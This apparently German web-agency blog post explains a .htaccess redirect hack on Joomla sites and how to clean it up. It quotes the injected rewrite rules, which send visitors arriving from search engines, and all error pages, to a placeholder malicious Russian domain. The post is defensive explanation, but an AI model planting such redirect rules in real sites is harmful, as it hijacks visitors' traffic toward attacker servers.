.htaccess redirect Hack. Besonders bedroht: Joomla CMS

Veröffentlicht in: Blog, am: | 1 Comment |
Dieser Artikel ist 12 Jahre alt und möglicherweise nicht mehr aktuell.
Der Artikel wurde am 2015-08-11 aktualisiert.

Nachdem wir über JS/iFrame.BO.1 besonders häufige Angriffe auf WordPress Systeme und Parallels Plesk Lücke berichtet haben, ist uns vor Kurzem ein weiteres Virus bekannt geworden. Dürfen wir vorstellen: der s.g. „htaccess redirect Hack“, made in Russland, besonders häufig diesmal betroffen: Joomla CMS Webseiten

Virus Wirkungsweise

Das Virus zeigt sich eigentlich nicht, solange eine Seite im Browser aufgerufen wird. Erfolgt der Zugriff aber über Google, oder eine andere Suchmaschine, wird man auf einen – meistens russischen – Server umgeleitet. Dies erfolgt mittels s.g. .htaccess-Redirects. Die .htaccess-Datei ist eine sich im Root-Ordner befindende Server Konfigurationsdatei, mit den Anweisungen, die vom Server als Erstes, vor allen anderen Dateien ausgeführt wird.

.htaccess Virus

.htaccess Virus

 

Die .htaccess-Anweisungen sind außerhalb der in einem Editor sichtbaren Spalten gerückt, um die Unauffälligkeit des schädlichen Code zu gewährleisten. Meistens sieht es so aus:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot)\.(.*)
RewriteRule ^(.*)$ http:// böseseite. ru [R=301,L] …

Möglich ist es, dass danach noch folgende Zeilen vorkommen:

ErrorDocument 400 http:// böseseite. ru
ErrorDocument 401 http:// böseseite. ru
ErrorDocument 403 http:// böseseite. ru
ErrorDocument 404 http:// böseseite. ru
ErrorDocument 500 http:// böseseite. ru

Das eigentliche Problem kommt aber danach: hat man die .htaccess-Datei berichtigt, die FTP-Zugangsdaten geändert, sogar die Updates vom CMS und dazugehörigen Modulen durchgeführt, erscheinen 10 bis 20 Minuten später die selben Codezeilen in der .htaccess! Häufig ist nicht nur die .htaccess-Dates im Root-Ordner verseucht, sondern werden es in absolut allen Ordnern solche Dateien erzeugt und mit dem schädlichen Code verseucht!

Nun sollte man sich drei Fragen stellen:

  • 1. Wie gelangte das Virus in das System
  • 2. Wie löst man das Problem und stell einen normalen Betrieb wieder her
  • 3. Was macht man in dem Fall, wenn Google die Seite in den Suchergebnissen als attackierend bezeichnet („Diese Website kann Ihren Computer beschädigen„-Meldung)

1) Joomla oder FTP gehackt

Besonders häufig kommt es in der letzten Zeit (seit ca. August 2012) vor, dass Sicherheitslücken in Joomla ausgenutzt werden. Ganz häufig wird das sehr verbreitete Bluestork Template gehackt. Da gibt es bekannterweise eine besonders häufig ausgenutzte Sicherheitslücke >>

Ganz häufig werden auch mit Hilfe verschiedener Tricks (Trojaner, Virus, Phishing-Mails, Unachtsamkeit) „einfach“ die FTP-Zugangsdaten entwendet. So oder so werden Nachdem infizierte Datei(en) am Server hinterlegt und in bestimmten Zeitabständen automatisch aufgerufen um den schädlichen Code ausführen.

2) .htaccess Virus (in Joomla oder nicht). Was tun?

Eine schnelle, vorläufige Lösung findet man auf dieser Seite Der Sinn der Lösung besteht darin, dass das Virus zwar nicht entfernt wird und weiter arbeitet, die .htaccess Datei nicht mehr beachtet wird, sondern eine neue, ganz andere.

In der Webserver Konfigurationsdatei (häufig „apache2.conf“) wird “AccessFilename” von .htaccess auf z.B. .htaccessneu abgeändert und die Direktive, das diese Datei nicht geändert werden darf, auch angepasst.

Diese Lösung ist aber temporär, der Hacker merkt schnell, dass es nun eine andere Datei gibt und passt sein Skript an. Häufig hat man außerdem keinen Zugriff auf die Serverkonfigurationsdateien, was dann?

Die Suche nach der infizierten Datei gestaltet sich als sehr kompliziert. Sie können es entweder selbst versuchen, anhand der im Internet vorhandenen Beispiele von bösartigen Shell-Codes oder uns damit beauftragen. Bleibt nichts anderes, dann gibt es noch eine Lösung: Server komplett vom Netz nehmen, alles löschen, saubere Backup Dateien einspielen. Im Falle eines laufenden Webshops kann sich diese Möglichkeit als schmerzhaft und kompliziert gestalten.

3) Diese Seite kann ihren Computer beschädigen. Was tun?

3. Was tun wenn Google die Website bereits als „unsauber“ erkennt, können SIe direkt hier lesen. Vergewissern Sie sich davor unbedingt, dass Ihr System sauber und sicher ist.

Über den Autor:
Foto von Vitaliy Malykin Vitaliy Malykin CEO von Design4u Köln Tel.: +49 2219753416 E-Mail: webmaster@design4u.org Websites: , , Wikipedia
Vitaliy Malykin (Dipl.-Kfm.) ist seit 2005 in den Bereichen Webentwicklung, Online Marketing, SEO, SEM und SMO unterwegs. Zu seinen Fähigkeiten und Kenntnissen zählen u. a. Suchmaschinenoptimierung, Webentwicklung, Webdesign, WordPress Development, Storytelling, Erstellung und Optimierung von Longreads und conversionsbasierter Landing Pages, Growth Hacking, aber auch Kommunikation, Führung von remote Entwickler Teams, Unternehmensführung, Beratung und Business Development. Malykin realisierte diverse IT-Projekte, plante, implementierte und setzte SEO Strategien und Maßnahmen für mehrere bekannte Unternehmen in Deutschland, Europa, Russland und der Welt um.
Gute Beiträge sind es wert geteilt zu werden!

Hinterlasse als Erster einen Kommentar

Name*
Email*

Kommentar